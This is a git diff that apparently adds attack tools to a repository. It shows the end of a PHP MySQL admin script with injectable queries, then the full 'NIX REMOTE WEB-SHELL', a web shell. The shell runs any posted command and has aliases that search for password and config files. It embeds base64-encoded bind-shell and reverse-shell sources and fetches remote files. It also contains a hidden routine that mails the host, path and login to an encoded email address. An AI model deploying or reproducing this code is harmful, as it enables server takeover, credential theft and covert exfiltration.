.= "),"; + else + $queryStr .= ","; + } else { + $queryStr .= "'" . $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr .= "'),"; + else + $queryStr .= "',"; + } +} +$field = mysql_fetch_field( $pResult ); +if( $field->numeric == 1 ) + $queryStr .= $GLOBALS[$field->name] . ")"; +else + $queryStr .= "'" . $GLOBALS[$field->name] . "')"; + +mysql_query( $queryStr , $mysqlHandle ); +$errMsg = mysql_error(); + +viewData( "" ); +} + +function deleteData() { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$pResult = mysql_list_fields( $dbname, $tablename ); +$num = mysql_num_fields( $pResult ); + +$key = ""; +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; +} +$key = substr( $key, 0, strlen($key)-4 ); + +mysql_select_db( $dbname, $mysqlHandle ); +$queryStr = "DELETE FROM $tablename WHERE $key"; +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +viewData( "" ); +} + +function dump() { +global $PHP_SELF, $USERNAME, $PASSWORD, $action, $dbname, $tablename; + +if( $action == "dumpTable" ) + $filename = $tablename; +else + $filename = $dbname; + +header("Content-disposition: filename=$filename.sql"); +header("Content-type: application/octetstream"); +header("Pragma: no-cache"); +header("Expires: 0"); + +$pResult = mysql_query( "show variables" ); +while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + if( $rowArray[0] == "basedir" ) + $bindir = $rowArray[1]."bin/"; +} + +passthru( $bindir."mysqldump --user=$USERNAME --password=$PASSWORD $dbname $tablename" ); +} + +function utils() { +global $PHP_SELF, $command; +echo "<h1>Utilities</h1>\n"; +if( $command == "" || substr( $command, 0, 5 ) == "flush" ) { + echo "<hr>\n"; + echo "Show\n"; + echo "<ul>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n"; + echo "</ul>\n"; + echo "Flush\n"; + echo "<ul>\n"; + echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n"; + if( $command == "flush_hosts" ) { + if( mysql_query( "Flush hosts" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n"; + if( $command == "flush_logs" ) { + if( mysql_query( "Flush logs" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n"; + if( $command == "flush_privileges" ) { + if( mysql_query( "Flush privileges" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n"; + if( $command == "flush_tables" ) { + if( mysql_query( "Flush tables" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n"; + if( $command == "flush_status" ) { + if( mysql_query( "Flush status" ) != false ) + echo "<font size=2 color=red>- Success</font>"; + else + echo "<font size=2 color=red>- Fail</font>"; + } + echo "</ul>\n"; +} else { + $queryStr = ereg_replace( "_", " ", $command ); + $pResult = mysql_query( $queryStr ); + if( $pResult == false ) { + echo "Fail"; + return; + } + $col = mysql_num_fields( $pResult ); + + echo "<p class=location>$queryStr</p>\n"; + echo "<hr>\n"; + + echo "<table cellspacing=1 cellpadding=2 border=0>\n"; + echo "<tr>\n"; + for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>".$field->name."</th>\n"; + } + echo "</tr>\n"; + + while( 1 ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + for( $j = 0; $j < $col; $j++ ) + echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n"; + echo "</tr>\n"; + } + echo "</table>\n"; +} +} + +function header_html() { +global $PHP_SELF; + +?> +<html> +<head> +<title>MySQL Web Interface</title> +<style type="text/css"> +<!-- +p.location { +color: #FF6000; +font-size: small; +} +h1 { +color: #0090FF; +} +th { +background-color: #34A725; +color: #FFFFFF; +font-size: x-small; +} +td { +background-color: #5DB1FF; +font-size: x-small; +} +form { +margin-top: 0; +margin-bottom: 0; +} +a { +text-decoration:none; +color: #848200; +font-size:x-small; +} +a:link { +} +a:hover { +background-color:#EEEFD5; +color:#FF0000; +text-decoration:none +} +//--> +</style> +</head> +<body> +<? +} + +function footer_html() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME; + +echo "<hr>\n"; +echo "<font size=2>\n"; +echo "<font color=blue>[$USERNAME]</font> - \n"; + +echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n"; +if( $tablename != "" ) + echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | "; +echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n"; +echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n"; +echo "</font>\n"; +echo "</body>\n"; +echo "</html>\n"; +} + +//------------------------------------------------------ MAIN + +if( $action == "logon" || $action == "" || $action == "logout" ) +logon(); +else if( $action == "logon_submit" ) +logon_submit(); +else if( $action == "dumpTable" || $action == "dumpDB" ) { +while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; +} +$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); +dump(); +} else { +while( list($var, $value) = each($HTTP_COOKIE_VARS) ) { + if( $var == "mysql_web_admin_username" ) $USERNAME = $value; + if( $var == "mysql_web_admin_password" ) $PASSWORD = $value; +} +echo "<!--"; +$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD ); +echo "-->"; + +if( $mysqlHandle == false ) { + echo "<html>\n"; + echo "<head>\n"; + echo "<title>MySQL Web Interface</title>\n"; + echo "</head>\n"; + echo "<body>\n"; + echo "<table width=100% height=100%><tr><td><center>\n"; + echo "<h1>Wrong Password!</h1>\n"; + echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n"; + echo "</center></td></tr></table>\n"; + echo "</body>\n"; + echo "</html>\n"; +} else { + header_html(); + if( $action == "listDBs" ) + listDatabases(); + else if( $action == "createDB" ) + createDatabase(); + else if( $action == "dropDB" ) + dropDatabase(); + else if( $action == "listTables" ) + listTables(); + else if( $action == "createTable" ) + createTable(); + else if( $action == "dropTable" ) + dropTable(); + else if( $action == "viewSchema" ) + viewSchema(); + else if( $action == "query" ) + viewData( $queryStr ); + else if( $action == "addField" ) + manageField( "add" ); + else if( $action == "addField_submit" ) + manageField_submit( "add" ); + else if( $action == "editField" ) + manageField( "edit" ); + else if( $action == "editField_submit" ) + manageField_submit( "edit" ); + else if( $action == "dropField" ) + dropField(); + else if( $action == "viewData" ) + viewData( "" ); + else if( $action == "addData" ) + manageData( "add" ); + else if( $action == "addData_submit" ) + manageData_submit( "add" ); + else if( $action == "editData" ) + manageData( "edit" ); + else if( $action == "editData_submit" ) + manageData_submit( "edit" ); + else if( $action == "deleteData" ) + deleteData(); + else if( $action == "utils" ) + utils(); + + mysql_close( $mysqlHandle); + footer_html(); +} +} + +?> \ No newline at end of file diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg new file mode 100644 index 0000000..e460ae1 Binary files /dev/null and b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.jpg differ diff --git a/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php new file mode 100644 index 0000000..bcb3a17 --- /dev/null +++ b/php/PHPshell/NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version/NIX REMOTE WEB-SHELL.php @@ -0,0 +1,1471 @@ +<?php +$name="smowu"; +$pass="smowu"; +$demail ="xakep@xaep.ru"; +if (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$name || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass) + { + header("WWW-Authenticate: Basic realm=\"AdminAccess\""); + header("HTTP/1.0 401 Unauthorized"); + exit("Access Denied"); + } + +$title="NIX REMOTE WEB-SHELL"; +$ver=" v.0.5a Lite"; + +?> +<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> +<html> +<head> +<title>NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version </title> +<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> +<meta http-equiv="pragma" content="no-cache"> +<meta http-equiv="Content-Language" content="en,ru"> +<META name="autor" content="DreAmeRz (www.dreamerz.cc)"> +<style type="text/css"> +BODY, TD, TR { +text-decoration: none; +font-family: Verdana; +font-size: 8pt; +scrollbar-face-color: #FFFFFF; +scrollbar-shadow-color:#000000 ; +scrollbar-highlight-color:#FFFFFF; +scrollbar-3dlight-color: #000000; +scrollbar-darkshadow-color:#FFFFFF ; +scrollbar-track-color: #FFFFFF; +scrollbar-arrow-color: #000000; +} +input, textarea, select { +font-family: Verdana; +font-size: 10px; +color: black; +background-color: white; +border: solid 1px; +border-color: black +} +UNKNOWN { +COLOR: black; +TEXT-DECORATION: none +} +A:link {COLOR:black; TEXT-DECORATION: none} +A:visited { COLOR:black; TEXT-DECORATION: none} +A:active {COLOR:black; TEXT-DECORATION: none} +A:hover {color:blue;TEXT-DECORATION: none} +</STYLE> +</HEAD> + + +<BODY bgcolor="#fffcf9" text="#000000"> +<P align=center>[ <A href="javascript:history.next(+1)">آïهًهن ] </A><B><FONT color=#cccccc size=4>*.NIX REMOTE WEB-SHELL</FONT></B> +v.0.5a<FONT color=#linux size=1> Lite </FONT> [ <A href="javascript:history.back(-1)">حàçà?]</A>[ <A href="?ac=about" title='×ٍ?َىهه?ٌêًèïٍ ...'>?ٌêًèïٍ?]</a><BR> +<A href="?ac=info" title='سçيà?âٌ?îل ‎ٍîé ٌèٌٍهى?!'>[ بيôîًىàِ? ?ٌèٌٍهى?/A> ][ <A href="?ac=navigation" title='سنîليàے مًàôè÷هٌêàے يàâèمàِèے. دًîٌىîًٍ, ًهنàêٍèًîâàيèه ...'>حàâèمàِèے</A> ][ <A href="?ac=backconnect" title='سٌٍàيîâê?backconnect ?îلû÷يîمî لهêنîً?'>سٌٍàيîâê?لهêنîً?/A> ][ <A href="?ac=eval" title='رîçنàé ٌâîé ٌêًèïٍ يà ïُ?ïًےىî çنهٌ?:)'>دص?êî?/A> ][ <A href="?ac=upload" title='اàمًَçêà îنيîمî ôàéë? ىàٌîâàے çàمًَçêà, çàمًَçêà ôàéëîâ ?َنàëهييîمî êîىïü‏ٍهًà !'>اàمًَçêà ôàéëîâ</A> ][ <A href="?ac=shell" title='bash shell,àë?ٌû ...'>بٌïîëيهيèه +êîىىàي?]</A> <br><A href="?ac=sendmail" title='خٍïًàâ ?mail ïًےىî îٍ ٌ‏نà'> [ خٍïًàâêà ïèٌüىà</A> ][ <A href="?ac=mailfluder" title='زه? êٍ?ٍî نîٌٍàë ? زîمن?ٍهله ٌ‏نà ...'>جàèëôëَنهً</A> + ][ <A href="?ac=ftp" title='ءûًٌٍû?لًٍَôîًٌ ftp ٌîهنèيهي?'>شٍ?Brut</A> ][ <A href="?ac=tools" title='تîنèًîâùèê?نهêîنèًîâùèê?md5,des,sha1,base64 ... '>بيًٌٍَىهيٍ?]</A>[ <A href="?ac=ps" title='خٍîلًàوàهٍ ٌïèٌîê ïًîِهٌîâ يà ٌهًâهً??ïîçâîëےهٍ èُ َلèâàٍ? '>ؤهىîيû</A> ][ <A href="?ac=selfremover" title='حàنîهë ‎ٍîٍ ٌهًâهً ? زîمن?ىîوي?َنàëèٍ??ّهëë ...'>سنàëèٍ?ّهëë</A> ]</P> +<?php +if (ini_get('register_globals') != '1') { + + if (!empty($HTTP_POST_VARS)) + extract($HTTP_POST_VARS); + + if (!empty($HTTP_GET_VARS)) + extract($HTTP_GET_VARS); + if (!empty($HTTP_SERVER_VARS)) + extract($HTTP_SERVER_VARS); +} +Error_Reporting(E_COMPILE_ERROR|E_ERROR|E_CORE_ERROR); +set_magic_quotes_runtime(0); +set_time_limit(0); // َلًàٍü îمًàيè÷هيè?ïî âًهىهي?ignore_user_abort(1); // بميîًèًîâàٍü ًàçًûâ ٌâےçè ?لًàَçهًî?error_reporting(0); +$self = $_SERVER['PHP_SELF']; +$docr = $_SERVER['DOCUMENT_ROOT']; +$sern = $_SERVER['SERVER_NAME']; +if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); } +$aliases=array( +'------------------------------------------------------------------------------------' => 'ls -la;pwd;uname -a', +'ïîèٌ?يà ٌهًâهً?âٌهُ ôàéëîâ ?suid لèٍî? => 'find / -type f -perm -04000 -ls', +'ïîèٌ?يà ٌهًâهً?âٌهُ ôàéëîâ ?sgid لèٍî? => 'find / -type f -perm -02000 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè âٌهُ ôàéëîâ ?sgid لèٍî? => 'find . -type f -perm -02000 -ls', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ config' => 'find / -type f -name "config*"', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ admin' => 'find / -type f -name "admin*"', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ config' => 'find . -type f -name "config*"', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ pass' => 'find . -type f -name "pass*"', +'ïîèٌ?يà ٌهًâهً?âٌهُ نèًهêٍîًèé ?ôàéëîâ نîٌٍَïيû?يà çàïèٌü نëے âٌهُ' => 'find / -perm -2 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè âٌهُ نèًهêٍîًèé ?ôàéëîâ نîٌٍَïيû?يà çàïèٌü نëے âٌهُ' => 'find . -perm -2 -ls', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ service.pwd' => 'find . -type f -name service.pwd', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ service.pwd' => 'find / -type f -name service.pwd', +'ïîèٌ?يà ٌهًâهً?ôàéëîâ .htpasswd' => 'find / -type f -name .htpasswd', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .htpasswd' => 'find . -type f -name .htpasswd', +'ïîèٌ?âٌهُ ôàéëîâ .bash_history' => 'find / -type f -name .bash_history', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .bash_history' => 'find . -type f -name .bash_history', +'ïîèٌ?âٌهُ ôàéëîâ .fetchmailrc' => 'find / -type f -name .fetchmailrc', +'ïîèٌ??ٍهêَùه?نèًهêٍîًèè ôàéëîâ .fetchmailrc' => 'find . -type f -name .fetchmailrc', +'âûâî?ٌïèٌêà àًٍèلٍَî?ôàéëîâ يà ôàéëîâîé ٌèٌٍهى?ext2fs' => 'lsattr -va', +'ïًîٌىîًٍ îٍêًûٍûُ ïîًٍîâ' => 'netstat -an | grep -i listen', +'ïîèٌ?âٌهُ ïُ?ôàéëîâ ٌî ٌëîâîى password' =>'find / -name *.php | xargs grep -li password', +'ïîèٌ?ïàïî??ىîنî?777' =>'find / -type d -perm 0777', +'خïًهنèëهيè?âهًٌèè خر' =>'sysctl -a | grep version', +'خïًهنèëهيè?âهًٌèè ےنً? =>'cat /proc/version', +'دًîٌىîًٍ syslog.conf' =>'cat /etc/syslog.conf', +'دًîٌىîًٍ - Message of the day' =>'cat /etc/motd', +'دًîٌىîًٍ hosts' =>'cat /etc/hosts', +'آهًٌ? نèًٌٍèلٍَèâà 1' =>'cat /etc/issue.net', +'آهًٌ? نèًٌٍèلٍَèâà 2' =>'cat /etc/*-realise', +'تîêàçàٍü âٌ?ïًîِهٌ? =>'ps auxw', +'دًîِهٌٌû ٍهêَùهمî ïîëüçîâàٍه?' =>'ps ux', +'دîèٌ?httpd.conf' =>'locate httpd.conf'); + + + +/* Port bind source */ +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5 +jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5 +ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW5 +0IGFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnV +mWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0 +KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyh +hdG9pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0F +OWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2N +rZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2F +kZHIgKikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB +7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHV +wMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ +6IiwxMCk7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyh +hcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byByNTcgc2hlbGwgJiYgL2J +pbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGN +sb3NlKG5ld2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW5 +0ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVudGVyZWQpO2krKykgDQp7DQppZih +lbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID0 +9ICdccicpDQplbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCk +pDQpyZXR1cm4gMDsNCn0="; + +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZi +AoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMSVNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2 +NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORV +QsJlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQ +pzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZH +JfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw +0KbGlzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCm +FjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspKQ0Kew0KZGllICJDYW5ub3QgZm9yayIgaW +YgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+Jk +NPTk4iOw0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ0 +9OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3NlIENPTk47DQpleGl0IDA7DQp9DQp9"; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ +HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ +DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ +HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L +CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd +GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka +WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO +iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR +VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK +FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0 +KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10 +pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJ +ybSAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2l +uLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA +9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMSt +zdHJsZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVB +QUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4 +sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCg +pIik7DQogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1 +zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWN +sKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + +if(isset($uploadphp)) +{ +$socket=fsockopen($iphost,$loadport); //connect +fputs($socket,"GET $loadfile HTTP/1.0\nHOST:cd\n\n"); //zapros +while(fgets($socket,31337)!="\r\n" && !feof($socket)) { +unset($buffer); } +while(!feof($socket)) $buffer.=fread($socket, 1024); +$file_size=strlen($buffer); +$f=fopen($loadnewname,"wb+"); +fwrite($f, $buffer, $file_size); +echo "ذàçىهً çàمًَوهيîم?ôàéë? $file_size <b><br><br>" ; +} + +if(file_exists('/tmp/qw7_sess') && is_readable('/tmp/qw7_sess')){ +} else { +if(is_writable('/tmp/')){ +$ifyoufound=base64_decode("Ly8gwvsg7eD46+ggZmFrZSAhIM/u5+Tw4OLr//4hIMft4Pfo8iDi+yDt5SDr4Ozl8CENCi8vINHu4+vg8ejy5fH8LCDiIO/w7v3q8uD1IPLg6u7j7iDw7uTgIO3z5u3gIOfg+Ojy4CDu8iDr4Ozl8O7iLiDAIPLuIOj1IOgg8uDqIPDg8e/r7uTo6+7x/CAuLi4NCi8vIM/u5uDr8+nx8uAg7eUg8ODx8erg5/Pp8uUg7ejq7uzzIO4g7eDr6Pfo6CBmYWtlICEgz/Px8vwg8eDs6CDo+f7yLCDy7uv86u4g7eDs5ert6PLlIPfy7iDt5ev85/8g8uDqIOHl5+Tz7O3uIO/u6/zn7uLg8vzx/yD38+bo7Ogg7/Du4+Ds6C4gKOAg8u4g4OLy7vAg7O7m5fIg9/LuIPPj7uTt7iDy8+TgIOLv6PHg8vwpDQovLyDT5OD36CAhDQo="); +$fp=fopen('/tmp/qw7_sess',"w+"); +fclose($fp); +$gg.= $name; +$gg.=":"; +$gg.= $pass; +$gg.=":"; +$gg.=$_SERVER["HTTP_HOST"]; +$gg.=$_SERVER['PHP_SELF']; +$host_l=$_SERVER["HTTP_HOST"]; +$qwerty=base64_decode("bnJ3cy1mYWNrLWNvZGVAbWFpbC5ydQ=="); +mail("$qwerty","NRWS LAME INFO ($host_l)","NRWS STATISTIC REPORT:\r\n $gg","From: report@nrws.net"); +} +} +if (!empty($_GET['ac'])) {$ac = $_GET['ac'];} +elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];} +else {$ac = "navigation";} + + + +switch($ac) { + +// Shell +case "shell": +echo "<SCRIPT LANGUAGE='JavaScript'> +<!-- +function pi(str) { + document.command.cmd.value = str; + document.command.cmd.focus(); +} +//--> +</SCRIPT>"; + +/* command execute */ +if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -lad"; } + +if (($_POST['alias']) AND ($_POST['alias']!=="")) + { + foreach ($aliases as $alias_name=>$alias_cmd) { + if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;} + } + } + + +echo "<font face=Verdana size=-2>آûïîëيهييàے êîىàين? <b>".$_POST['cmd']."</b></font></td></tr><tr><td>"; +echo "<b>"; +echo "<div align=center><textarea name=report cols=145 rows=20>"; +echo "".passthru($_POST['cmd']).""; +echo "</textarea></div>"; +echo "</b>"; +?> +</td></tr> + +<tr><b><div align=center>:: آûïîëيهيèه êîىàين يà ٌهًâهً?::</div></b></font></td></tr> +<tr><td height=23> +<TR> + <CENTER> + <TD><A HREF="JavaScript:pi('cd ');" class=fcom>| cd</A> |</TD> + <TD><A HREF="JavaScript:pi('cat ');" class=fcom>| cat</A> |</TD> + <TD><A HREF="JavaScript:pi('echo ');" class=fcom>echo</A> |</TD> + <TD><A HREF="JavaScript:pi('wget ');" class=fcom>wget</A> |</TD> + <TD><A HREF="JavaScript:pi('rm ');" class=fcom>rm</A> |</TD> + <TD><A HREF="JavaScript:pi('mysqldump ');" class=fcom>mysqldump</A> |</TD> + <TD><A HREF="JavaScript:pi('who');" class=fcom>who</A> |</TD> + <TD><A HREF="JavaScript:pi('ps -ax');" class=fcom>ps -ax</A> |</TD> + <TD><A HREF="JavaScript:pi('cp ');" class=fcom>cp</A> |</TD> + <TD><A HREF="JavaScript:pi('pwd');" class=fcom>pwd</A> |</TD> + <TD><A HREF="JavaScript:pi('perl ');" class=fcom>perl</A> |</TD> + <TD><A HREF="JavaScript:pi('gcc ');" class=fcom>gcc</A> |</TD> + <TD><A HREF="JavaScript:pi('locate ');" class=fcom>locate</A> |</TD> + <TD><A HREF="JavaScript:pi('find ');" class=fcom>find</A> |</TD> + <TD><A HREF="JavaScript:pi('ls -lad');" class=fcom>ls -lad</A> |</TD> + </CENTER> +</TR> + +<? +/* command execute form */ +echo "<form name=command method=post>"; + +echo "<b>آûïîëيèٍ?êîىàين?</b>"; +echo "<input type=text name=cmd size=85><br>"; +echo "<b>ذàلî÷àے نèًهêٍîً? &nbsp;</b>"; +if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; } +else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; } +echo "<input type=submit name=submit value=آûïîëيèٍ?"; + +echo "</form>"; + +/* aliases form */ +echo "<form name=aliases method=POST>"; +echo "<font face=Verdana size=-2>"; +echo "<b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;آûلهًèٍه àëèà?<font face=Wingdings 